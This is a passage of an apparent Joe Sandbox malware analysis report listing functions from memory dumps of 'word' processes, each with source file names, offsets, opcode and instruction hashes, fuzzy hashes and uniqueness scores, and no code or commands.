                        • Opcode ID: 5ec6abda554238043cb1d2d28463e0714b6cbebb66b77fcdd9c49b42d0806e7c
                        • Instruction ID: 02c62b6a3b38f965aebdcef835c2089248dd289051cbe229c37c90b206b865ae
                        • Opcode Fuzzy Hash: 5ec6abda554238043cb1d2d28463e0714b6cbebb66b77fcdd9c49b42d0806e7c
                        • Instruction Fuzzy Hash: DAD05B715083515FD305DA14D8D0456B751EBD562471485CFDDA0573A2D6519C07C750
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 00F4B8EB Relevance: .0, Instructions: 14COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000013.00000002.522401959.0000000000F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F40000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_19_2_f40000_word.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 9ddc6f976ba370eccf1e0341d36bd40de7f92d3405b1022222df074ad7f8e16b
                        • Instruction ID: f60a0c828f943c248fc374281974a697f8fb50ce0f07789e85547e02b46d3eab
                        • Opcode Fuzzy Hash: 9ddc6f976ba370eccf1e0341d36bd40de7f92d3405b1022222df074ad7f8e16b
                        • Instruction Fuzzy Hash: 19D067356082809FC305CB19C865815FBF59F96211729C8AEE489CB262D6319843D711
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 04D40C68 Relevance: .0, Instructions: 14COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000013.00000002.527891319.0000000004D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 04D40000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_19_2_4d40000_word.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 1557b3096f5549f6873ca8ac1cca56595c580b1082ba2b4e2f2b1d6ab691ded8
                        • Instruction ID: c0cb13832f7d83fe505282d696296f05ff0229d3c1a969c0e772b66e44947037
                        • Opcode Fuzzy Hash: 1557b3096f5549f6873ca8ac1cca56595c580b1082ba2b4e2f2b1d6ab691ded8
                        • Instruction Fuzzy Hash: 86D05EB2308381AFC302CB08C860866BB61FFD5300B048C9FF88187266CB26EC16CB95
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 04D43429 Relevance: .0, Instructions: 14COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000013.00000002.527891319.0000000004D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 04D40000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_19_2_4d40000_word.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 5c3e0af1f3ee5c8b06aad8975cfcf266f63d6187842d0a4014a831ba703f9f3d
                        • Instruction ID: 3e0617986de5cf790a87249a28f7e45c8718aef6ceeca8e75e55a247d945f5a2
                        • Opcode Fuzzy Hash: 5c3e0af1f3ee5c8b06aad8975cfcf266f63d6187842d0a4014a831ba703f9f3d
                        • Instruction Fuzzy Hash: 30D0C9757092405FD315C624C8E1886BBA2AFDA324725C4EED449C73A6DA39DD47C611
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 04D4CFB0 Relevance: .0, Instructions: 14COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000013.00000002.527891319.0000000004D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 04D40000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_19_2_4d40000_word.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 9361a77d09aea8fd69af2be6012f7590b9f6f34b8363b6069a5c49a567268190
                        • Instruction ID: 783b6faf7c6948e658ce9ed8f04930c3674bdbe08c7831fb3ee16552aa1d592f
                        • Opcode Fuzzy Hash: 9361a77d09aea8fd69af2be6012f7590b9f6f34b8363b6069a5c49a567268190
                        • Instruction Fuzzy Hash: 36D0A930A466208FC304AA08F009AA533D9EB84324F4400B6E80A8B750DB682C90CA84
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 04D44713 Relevance: .0, Instructions: 14COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000013.00000002.527891319.0000000004D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 04D40000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_19_2_4d40000_word.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 6e5fec77aa167ec3623ee88abcab07c700e3847675508655964f9baad6190aa5
                        • Instruction ID: b394431afec180458b2f17e403b7c84aa4127660e3384dd999cd3e5a13e17047
                        • Opcode Fuzzy Hash: 6e5fec77aa167ec3623ee88abcab07c700e3847675508655964f9baad6190aa5
                        • Instruction Fuzzy Hash: 27D0A7B01092406FC341EF20C459405BFA1FF97380F5A84DEC485CB167DA334907C710
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 04D40301 Relevance: .0, Instructions: 14COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000013.00000002.527891319.0000000004D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 04D40000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_19_2_4d40000_word.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 15ca3732128a0491c5e4d2df48a3939ded9c1ffe77f2fd0f6ed224a58fcf511a
                        • Instruction ID: b0bcd0d818028fb86286ebd76ad6591a98516ee50685fa3ea6fdf9a60ab44054
                        • Opcode Fuzzy Hash: 15ca3732128a0491c5e4d2df48a3939ded9c1ffe77f2fd0f6ed224a58fcf511a
                        • Instruction Fuzzy Hash: 94D0A772208211AF9240CF04E940C3BF7F6DBD4B00B04C84EB881D3310CA62DD16CB72
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 00F44350 Relevance: .0, Instructions: 13COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000013.00000002.522401959.0000000000F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F40000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_19_2_f40000_word.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 2c73bf2ba2eafa7557797446368059ceb0e1aa2e970bd45a4be0b42d31550924
                        • Instruction ID: d6a589a957e633b2ad1bf500c770d151988b8dc1e9d7190228fea4b897985f06
                        • Opcode Fuzzy Hash: 2c73bf2ba2eafa7557797446368059ceb0e1aa2e970bd45a4be0b42d31550924
                        • Instruction Fuzzy Hash: 12D0177010A3815FC312C720C869A12BFB55F86214F2888EED489CB2A3DA36A806CB16
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 04D45690 Relevance: .0, Instructions: 13COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000013.00000002.527891319.0000000004D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 04D40000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_19_2_4d40000_word.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: cbfd95dfbdf33bece5a37b1fdbb0948b898c96b2c98195f82341cf91517b31eb
                        • Instruction ID: daa64e60b5134ffeef0890b00be93dfc2d149ef6594588866e2540ec1b96112f
                        • Opcode Fuzzy Hash: cbfd95dfbdf33bece5a37b1fdbb0948b898c96b2c98195f82341cf91517b31eb
                        • Instruction Fuzzy Hash: ABD09E711157409FC3519F20C859806FFB0EF97340B9AC8AEC486CB1A6DA354907DB15
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 04D40308 Relevance: .0, Instructions: 13COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000013.00000002.527891319.0000000004D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 04D40000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_19_2_4d40000_word.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 791868b2b6d4904eca63423b42afb3773cf3bd7afed7f015f908fe64dc81cf6d
                        • Instruction ID: 1d2c5b51030abd186a83bee4b09449a282c16bbf154cb9b97365610c327b5c4c
                        • Opcode Fuzzy Hash: 791868b2b6d4904eca63423b42afb3773cf3bd7afed7f015f908fe64dc81cf6d
                        • Instruction Fuzzy Hash: B8D0C9712081219F9244CA48E950C6BB7E9DBC9A10B14884EB88493241CA62DC16CBB2
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 04D4BD60 Relevance: .0, Instructions: 12COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000013.00000002.527891319.0000000004D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 04D40000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_19_2_4d40000_word.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: d8f08d21f774e0548807ce75b8506ffde3543316bcdcbdd5788bc2b68125c542
                        • Instruction ID: bcf9ef9c82f7d3924de405cb1b01dc34d2668a849c410a3a4cb9bba8efa29a2e
                        • Opcode Fuzzy Hash: d8f08d21f774e0548807ce75b8506ffde3543316bcdcbdd5788bc2b68125c542
                        • Instruction Fuzzy Hash: 91C012712082605F8244DA48C850C67F7E9AFCD110718C84FB494C3341CA61DC07C7A0
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 00F40460 Relevance: .0, Instructions: 11COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000013.00000002.522401959.0000000000F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F40000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_19_2_f40000_word.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: bc965a8a84a01070074ba96cac20fef8f448fc434c361908372ff584ead7715d
                        • Instruction ID: de44283e7c7546d74c1f8c2003c370184b09e40a0de692e63acec97384c2819c
                        • Opcode Fuzzy Hash: bc965a8a84a01070074ba96cac20fef8f448fc434c361908372ff584ead7715d
                        • Instruction Fuzzy Hash: 5BD0123020E3C09FC3038B24C821418BF708E8720931988CFD8C5CB2A7CE2AA80AD792
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 04D439A0 Relevance: .0, Instructions: 11COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000013.00000002.527891319.0000000004D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 04D40000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_19_2_4d40000_word.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: b42eb4a4237f3f300b34101a9c64c7a2a34653e472d88958374a96a308d26003
                        • Instruction ID: 0a79cfcc9f3950630def7aa8d5064f7db411a5ec17eeb1af5eeabda724e68817
                        • Opcode Fuzzy Hash: b42eb4a4237f3f300b34101a9c64c7a2a34653e472d88958374a96a308d26003
                        • Instruction Fuzzy Hash: 8EC012752082209F9244DA08C840C66B3AAFBC8210B14C84EE85083300CBA2EC07CBA0
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 04D47718 Relevance: .0, Instructions: 11COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000013.00000002.527891319.0000000004D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 04D40000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_19_2_4d40000_word.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: b42eb4a4237f3f300b34101a9c64c7a2a34653e472d88958374a96a308d26003
                        • Instruction ID: 0a79cfcc9f3950630def7aa8d5064f7db411a5ec17eeb1af5eeabda724e68817
                        • Opcode Fuzzy Hash: b42eb4a4237f3f300b34101a9c64c7a2a34653e472d88958374a96a308d26003
                        • Instruction Fuzzy Hash: 8EC012752082209F9244DA08C840C66B3AAFBC8210B14C84EE85083300CBA2EC07CBA0
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 00F472FF Relevance: .0, Instructions: 10COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000013.00000002.522401959.0000000000F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F40000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_19_2_f40000_word.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: b6dad8a375b2834c6ebe6ab40bb1e69f13bdeccbe147e6e64d29eef4c7d44c9d
                        • Instruction ID: 1c05d8b8d8d6bac7355c30c23331c96e64313e983d126312016aeb13e467d583
                        • Opcode Fuzzy Hash: b6dad8a375b2834c6ebe6ab40bb1e69f13bdeccbe147e6e64d29eef4c7d44c9d
                        • Instruction Fuzzy Hash: AAC08CC5D8D3D05EC70B3B609C292857FB08C030403CA50C34445C90AFE40D0A0E47D2
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 00F47BD0 Relevance: .0, Instructions: 10COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000013.00000002.522401959.0000000000F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F40000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_19_2_f40000_word.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 3330a26405ee38e155c121b65037bfe48d56cf03da67f3eebeb645495b72ac09
                        • Instruction ID: 66551ab73520acd7a4e9f79881a5f1751e7d95c70cec7eca84c34bd727a3ae71
                        • Opcode Fuzzy Hash: 3330a26405ee38e155c121b65037bfe48d56cf03da67f3eebeb645495b72ac09
                        • Instruction Fuzzy Hash: BAC0026510E2818FC71287B488A9404BF715F5611432A94CBE444CB2A7CF1ADE4BD752
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 04D46A92 Relevance: .0, Instructions: 10COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000013.00000002.527891319.0000000004D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 04D40000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_19_2_4d40000_word.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 76630fbe74cd4263637bbc193f84f1c25abb35bddc76cad71383d0a878f713c8
                        • Instruction ID: 982eb64ab226481fb64d1fe399ac404256bd38cb4adfd9bcec919c1a67c03f71
                        • Opcode Fuzzy Hash: 76630fbe74cd4263637bbc193f84f1c25abb35bddc76cad71383d0a878f713c8
                        • Instruction Fuzzy Hash: E9C0923740580C9F8A02FB90E50245CB3A9EF9221071006EAA81A4F27ADF221A349B82
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 00F4D0D3 Relevance: .0, Instructions: 8COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000013.00000002.522401959.0000000000F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F40000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_19_2_f40000_word.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 02ac563a14169b87d8b92b6916aee83de9a10334b277bde5b4c96001b91f3bb8
                        • Instruction ID: 9e48429772ebd30a845f4e8706fb32ed884d20dd7beb272c93b2cc3b4bdd84bb
                        • Opcode Fuzzy Hash: 02ac563a14169b87d8b92b6916aee83de9a10334b277bde5b4c96001b91f3bb8
                        • Instruction Fuzzy Hash: 0EC08C8000C6C15FC303433448B04B0BFB0AC4320030E00CDC4D44B1B3DB15A873E781
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 00F473B0 Relevance: .0, Instructions: 8COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000013.00000002.522401959.0000000000F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F40000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_19_2_f40000_word.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 778481114c374013f58dd504163b08aecaedb20851cd843d8b2e6942ade4442f
                        • Instruction ID: 4a00f5dc1a4745342057266f99d99f8343528934673bb8150e6a530dc89bb7bf
                        • Opcode Fuzzy Hash: 778481114c374013f58dd504163b08aecaedb20851cd843d8b2e6942ade4442f
                        • Instruction Fuzzy Hash: 71C09238250208CFC340DB59D589C10BBE8EF49A2835980D8E50D8B733CB32FC01CA80
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 00F478B8 Relevance: .0, Instructions: 8COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000013.00000002.522401959.0000000000F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F40000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_19_2_f40000_word.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 16581dba91a5fda841cf47983153eb36e4fc24851952f78b75638f70de6cde10
                        • Instruction ID: 60a72056a403d9f31dd85fef4a7a76d12bb133d0d450fb6ef353260f5a4d9492
                        • Opcode Fuzzy Hash: 16581dba91a5fda841cf47983153eb36e4fc24851952f78b75638f70de6cde10
                        • Instruction Fuzzy Hash: 0BC09274300100AF8348CA18C895C26F7E6EFD8214B24C46DB84DC7365EF32EC03CA10
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 04D456A0 Relevance: .0, Instructions: 8COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000013.00000002.527891319.0000000004D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 04D40000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_19_2_4d40000_word.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 16581dba91a5fda841cf47983153eb36e4fc24851952f78b75638f70de6cde10
                        • Instruction ID: 60a72056a403d9f31dd85fef4a7a76d12bb133d0d450fb6ef353260f5a4d9492
                        • Opcode Fuzzy Hash: 16581dba91a5fda841cf47983153eb36e4fc24851952f78b75638f70de6cde10
                        • Instruction Fuzzy Hash: 0BC09274300100AF8348CA18C895C26F7E6EFD8214B24C46DB84DC7365EF32EC03CA10
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 04D44720 Relevance: .0, Instructions: 8COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000013.00000002.527891319.0000000004D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 04D40000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_19_2_4d40000_word.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 16581dba91a5fda841cf47983153eb36e4fc24851952f78b75638f70de6cde10
                        • Instruction ID: 60a72056a403d9f31dd85fef4a7a76d12bb133d0d450fb6ef353260f5a4d9492
                        • Opcode Fuzzy Hash: 16581dba91a5fda841cf47983153eb36e4fc24851952f78b75638f70de6cde10
                        • Instruction Fuzzy Hash: 0BC09274300100AF8348CA18C895C26F7E6EFD8214B24C46DB84DC7365EF32EC03CA10
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 00F44B70 Relevance: .0, Instructions: 7COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000013.00000002.522401959.0000000000F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F40000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_19_2_f40000_word.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: cdfec89ecf4d227c2e3f2741df1fca2c4e7a0756e2f1ba050c9a008d3bdc9887
                        • Instruction ID: e80b9cbb32ce7aa80f269217a2acaa4f8c5de131eb2df65f765f3a476441bad2
                        • Opcode Fuzzy Hash: cdfec89ecf4d227c2e3f2741df1fca2c4e7a0756e2f1ba050c9a008d3bdc9887
                        • Instruction Fuzzy Hash: 3DB002747054005B8748D65DD951515A7D29BC9215728C4AD641DC7355DE22DD039644
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 00F40470 Relevance: .0, Instructions: 5COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000013.00000002.522401959.0000000000F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F40000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_19_2_f40000_word.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 848e7b2b3d1d7438aceb18ee9ce77d60f8a3148b9db338e3d364b5add5ce48b1
                        • Instruction ID: 424522431131923360a2424e5b60fcaca403654da384226d21dcd1d1d325544f
                        • Opcode Fuzzy Hash: 848e7b2b3d1d7438aceb18ee9ce77d60f8a3148b9db338e3d364b5add5ce48b1
                        • Instruction Fuzzy Hash: B3A001746050109B8689DA58D991818B7A2ABC9219728C4ADA819CB25ACF33E9039A44
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 04D46C00 Relevance: .0, Instructions: 5COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000013.00000002.527891319.0000000004D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 04D40000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_19_2_4d40000_word.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 848e7b2b3d1d7438aceb18ee9ce77d60f8a3148b9db338e3d364b5add5ce48b1
                        • Instruction ID: 424522431131923360a2424e5b60fcaca403654da384226d21dcd1d1d325544f
                        • Opcode Fuzzy Hash: 848e7b2b3d1d7438aceb18ee9ce77d60f8a3148b9db338e3d364b5add5ce48b1
                        • Instruction Fuzzy Hash: B3A001746050109B8689DA58D991818B7A2ABC9219728C4ADA819CB25ACF33E9039A44
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 00F43A60 Relevance: .0, Instructions: 4COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000013.00000002.522401959.0000000000F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F40000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_19_2_f40000_word.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 584a3913bed7d41f6751d29dc0af2e109adf5df94d8de11209de24b86f245c04
                        • Instruction ID: 2108930940694c1c8b8ad4272d9396267f2db374b9021a0985f6588530823504
                        • Opcode Fuzzy Hash: 584a3913bed7d41f6751d29dc0af2e109adf5df94d8de11209de24b86f245c04
                        • Instruction Fuzzy Hash: 6BA002742010009BC644DB54C991814F761EFC5219728C4DDA8198B256CF33ED03DA40
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 04D426A2 Relevance: .0, Instructions: 4COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000013.00000002.527891319.0000000004D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 04D40000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_19_2_4d40000_word.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 584a3913bed7d41f6751d29dc0af2e109adf5df94d8de11209de24b86f245c04
                        • Instruction ID: 2108930940694c1c8b8ad4272d9396267f2db374b9021a0985f6588530823504
                        • Opcode Fuzzy Hash: 584a3913bed7d41f6751d29dc0af2e109adf5df94d8de11209de24b86f245c04
                        • Instruction Fuzzy Hash: 6BA002742010009BC644DB54C991814F761EFC5219728C4DDA8198B256CF33ED03DA40
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Non-executed Functions

                        Function 00F47CA0 Relevance: .3, Instructions: 348COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000013.00000002.522401959.0000000000F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F40000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_19_2_f40000_word.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 9b31bdbaf2e68a3577ca036f32f68873eafa61a477167dace83d1fcb5eb51280
                        • Instruction ID: 2442dd3a61bb01346bd8645f947a33b23ff947a3b1973b2980661fa3d7c1dc45
                        • Opcode Fuzzy Hash: 9b31bdbaf2e68a3577ca036f32f68873eafa61a477167dace83d1fcb5eb51280
                        • Instruction Fuzzy Hash: F5D1BE71E142298FCB01DFA8C8806ADFBF1FF88344F14866AD855EB256D734AD46CB90
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 00F47C2F Relevance: .3, Instructions: 283COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000013.00000002.522401959.0000000000F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F40000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_19_2_f40000_word.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 422c405c83a102ca26dcc05448ed5e32283ee7e1e2084272803c185af60c59d5
                        • Instruction ID: 89aa05ec24c45898590d2f739197f24671e02dedd573d57d32c756474f65d127
                        • Opcode Fuzzy Hash: 422c405c83a102ca26dcc05448ed5e32283ee7e1e2084272803c185af60c59d5
                        • Instruction Fuzzy Hash: F4B17C71E182698FCB11DFA8C8806ADFBF1FF45340F15866AD854EB252D734AD4ACB90
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Executed Functions

                        Function 00C62C20 Relevance: .7, Instructions: 727COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000014.00000002.521166837.0000000000C60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C60000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_20_2_c60000_word.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 3aa3b6a3b471cf8a82e95d6cca1602feac8c99a965e6aa71b9b5513a9eab4b66
                        • Instruction ID: 4447b6310ef96ca3706b7ebf236353ee02e8aa8eb87025f58a30e4716dc43498
                        • Opcode Fuzzy Hash: 3aa3b6a3b471cf8a82e95d6cca1602feac8c99a965e6aa71b9b5513a9eab4b66
                        • Instruction Fuzzy Hash: 4C624735A005149FCB25DFA8C984F9DBBB2FF48314F1581A9E50AAB262CB31ED91DF50
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 00C66581 Relevance: .4, Instructions: 416COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000014.00000002.521166837.0000000000C60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C60000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_20_2_c60000_word.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 7722006b67131465b1a7c0f0619748e7a764dd157809e055b5da125acbbd8daf
                        • Instruction ID: efff3c89ddccc32e5a8c252e0dc30b7953563065ba62e65a74a6cc3cb7153b1b
                        • Opcode Fuzzy Hash: 7722006b67131465b1a7c0f0619748e7a764dd157809e055b5da125acbbd8daf
                        • Instruction Fuzzy Hash: 8F123974A441288FCB64DF68D994B99B7B5EF88310F1185D9E9099B3A1DB30EE81CF90
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 00C65BD1 Relevance: 1.9, Strings: 1, Instructions: 619COMMON
                        Download Yara Rule
                        Strings
                        Memory Dump Source
                        • Source File: 00000014.00000002.521166837.0000000000C60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C60000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_20_2_c60000_word.jbxd
                        Similarity
                        • API ID:
                        • String ID: 2
                        • API String ID: 0-450215437
                        • Opcode ID: 98032255cd78a60ca61a76cdb5c2953a16644a43c8820aff9c0e0150530b9da3
                        • Instruction ID: 7a0194d610aeb1c00a40b42580d63717c2bb5bb385944bec885045ca0d64b6ab
                        • Opcode Fuzzy Hash: 98032255cd78a60ca61a76cdb5c2953a16644a43c8820aff9c0e0150530b9da3
                        • Instruction Fuzzy Hash: FF422870A042188FDB60DF64D990B9DB7F6EF88304F1085A9E50AEB365EB319E85CF51
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 00C65AF4 Relevance: 1.6, Strings: 1, Instructions: 368COMMON
                        Download Yara Rule
                        Strings
                        Memory Dump Source
                        • Source File: 00000014.00000002.521166837.0000000000C60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C60000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_20_2_c60000_word.jbxd
                        Similarity
                        • API ID:
                        • String ID: 2
                        • API String ID: 0-450215437
                        • Opcode ID: f859683505a37de52d7a6dca9a76855d8dc861315f757dac112a988af691b35f
                        • Instruction ID: 1aa6deaee7807126269f68e72b77df50d9f1bd7e3e9b70c512f0c9af4cc95632
                        • Opcode Fuzzy Hash: f859683505a37de52d7a6dca9a76855d8dc861315f757dac112a988af691b35f
                        • Instruction Fuzzy Hash: 2B02C474A016588FCB54DF68D984B9DB7F5EF88304F1085A9E90AEB361DB30AE85CF50
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 00C6BC50 Relevance: 1.3, Strings: 1, Instructions: 95COMMON
                        Download Yara Rule
                        Strings
                        Memory Dump Source
